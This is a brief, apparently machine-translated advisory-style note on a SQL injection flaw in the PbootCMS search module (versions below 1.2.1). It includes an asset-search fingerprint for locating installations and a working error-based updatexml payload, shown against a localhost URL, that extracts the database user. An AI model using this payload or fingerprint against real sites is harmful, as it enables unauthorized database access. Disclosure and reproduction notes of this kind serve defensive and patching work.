Pbootcms Search Sql Injection Vulnerability
Pbootcms Search Sql Injection Vulnerability
PbootCMS search SQL injection vulnerability
Vulnerability Description
The PbootCMS search module has a SQL injection vulnerability.
Vulnerability Impact
PbootCMS < 1.2.1
Network surveying and mapping
app=”PBOOTCMS”
Vulnerability reappears
The search box page is
Payload for
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](https://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
This post is licensed under CC BY 4.0 by the author.